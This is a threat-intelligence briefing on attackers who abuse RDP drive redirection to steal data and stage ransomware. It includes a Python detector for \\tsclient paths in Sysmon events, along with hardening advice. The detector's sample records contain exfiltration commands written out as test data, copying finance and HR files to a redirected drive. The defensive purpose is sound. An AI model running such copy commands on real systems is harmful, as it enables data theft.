RDP Abuse and Swiss Army Knife Tool Used to Pillage, Encrypt and Manipulate Data (Dec 18, 2019)
Bitdefender has reported on a technique in which attackers abuse a legitimate Remote Desktop Protocol (RDP) feature, drive redirection. When the RDP client connects with one of its local drives shared, that drive appears inside the remote session under the \\tsclient network location (for example \\tsclient\C), with no separate network share or credentials needed. The actors use this redirected drive in both directions: data stolen from the compromised host is copied to the attacker's own machine over the existing RDP session, and an off-the-shelf component placed on the redirected drive is executed from its \\tsclient path using cmd.exe or explorer.exe. Ransomware appears to be used as the final payload. At the time of this writing the actors had collected at least $150,000 in cryptocurrency.
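The host-side signal that gives this technique away is a process whose image, or whose command line, names a \\tsclient\ path. The following is an added example, not code from the Bitdefender report or from this briefing: a small Python detector run over a few constructed Sysmon process-creation records flattened to a Key=value|Key=value line. The sample records, the flattened format, the list of file-transfer tools and the severities are assumptions for illustration; on a real host the same rules would be applied to Sysmon Event ID 1 or Security 4688 events with command-line auditing enabled. The rules generalise slightly beyond the page (any launcher, not only cmd.exe/explorer.exe, and copy tools beyond the built-in copy).

```python
import re
from typing import Dict, List, Optional, Tuple

# Drives redirected by the RDP client are exposed inside the session as \\tsclient\<letter>\...
TSCLIENT_RE = re.compile(r"\\\\tsclient\\", re.IGNORECASE)

# Binaries that move files. A \\tsclient\ path on their command line means data is crossing
# the RDP channel: out to the attacker's machine (exfiltration) or in (payload staging).
# cmd.exe is listed because the built-in copy/move run under it. The list is an assumption.
COPY_TOOLS = {"cmd.exe", "xcopy.exe", "robocopy.exe", "powershell.exe"}

# Constructed sample: Sysmon Event ID 1 (process creation) flattened to Key=value|Key=value.
SAMPLE_EVENTS: List[str] = [
    r'RecordId=101|UtcTime=2019-12-18 10:02:11|Image=\\tsclient\C\stage\payload.exe|'
    r'CommandLine="\\tsclient\C\stage\payload.exe" /run|ParentImage=C:\Windows\explorer.exe|User=CORP\svc_rdp',
    r'RecordId=102|UtcTime=2019-12-18 10:05:40|Image=C:\Windows\System32\cmd.exe|'
    r'CommandLine=cmd.exe /c copy D:\finance\ledger.db \\tsclient\C\loot\|ParentImage=C:\Windows\explorer.exe|User=CORP\svc_rdp',
    r'RecordId=103|UtcTime=2019-12-18 10:06:02|Image=C:\Windows\System32\notepad.exe|'
    r'CommandLine=notepad.exe C:\Users\bob\notes.txt|ParentImage=C:\Windows\explorer.exe|User=CORP\bob',
    r'RecordId=104|UtcTime=2019-12-18 10:09:15|Image=C:\Windows\System32\robocopy.exe|'
    r'CommandLine=robocopy E:\hr \\tsclient\D\out /E|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\svc_rdp',
    r'RecordId=105|UtcTime=2019-12-18 11:30:00|Image=C:\Windows\System32\notepad.exe|'
    r'CommandLine=notepad.exe \\tsclient\C\readme.txt|ParentImage=C:\Windows\explorer.exe|User=CORP\alice',
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened record into a field dictionary."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Tuple[str, str]]:
    r"""Return (severity, reason) for one process-creation event, or None if it is uninteresting.

    Rules, most to least specific:
      1. the process image itself lives under \\tsclient\  -> payload run straight off the attacker's drive
      2. a file-transfer tool names a \\tsclient\ path      -> data moving across the RDP channel
      3. anything else mentioning \\tsclient\               -> worth a look, often legitimate admin use
    """
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    if TSCLIENT_RE.match(image):
        return "high", "process image executed directly from a redirected RDP client drive"
    if basename(image) in COPY_TOOLS and TSCLIENT_RE.search(cmdline):
        return "medium", "file transfer tool referencing a redirected RDP client drive (exfiltration or staging)"
    if TSCLIENT_RE.search(cmdline):
        return "low", "command line references a redirected RDP client drive"
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over flattened events and return the findings in input order."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        event = parse_event(line)
        verdict = classify(event)
        if verdict is None:
            continue
        findings.append({
            "RecordId": event.get("RecordId", "?"),
            "User": event.get("User", "?"),
            "severity": verdict[0],
            "reason": verdict[1],
            "CommandLine": event.get("CommandLine", ""),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] record {f['RecordId']} user={f['User']}: {f['reason']}")
        print(f"         {f['CommandLine']}")
```

Running the block flags records 101 (high), 102 and 104 (medium) and 105 (low) and ignores 103. The low tier exists because administrators legitimately open files from their own redirected drive; tuning comes from correlating on the logon session and on which accounts are expected to use RDP at all.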
Recommendation: Keep servers patched and running current software. Do not expose RDP directly to the internet; place it behind a VPN or gateway, require strong, unique passwords and multi-factor authentication for RDP and all other remote access, and enable Network Level Authentication. Because this technique depends on drive redirection, disable it wherever it is not needed: the "Do not allow drive redirection" Group Policy (Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Device and Resource Redirection, registry value fDisableCdm=1 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services) blocks it on the session host regardless of what the client requests. Note that the data transfer and payload execution ride inside the encrypted RDP session, so network intrusion detection and prevention systems will see only an RDP connection; they remain useful for spotting brute-force and unexpected sources, but this activity is visible mainly in host telemetry such as process-creation events and file access involving \\tsclient\ paths. Furthermore, always practice Defense in Depth (do not rely on a single security mechanism; security measures should be layered, redundant, and failsafe). In the case of ransomware infection, the affected systems should be wiped and reformatted, even if the ransom is paid, and other machines on the same network should be scanned for further infections.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.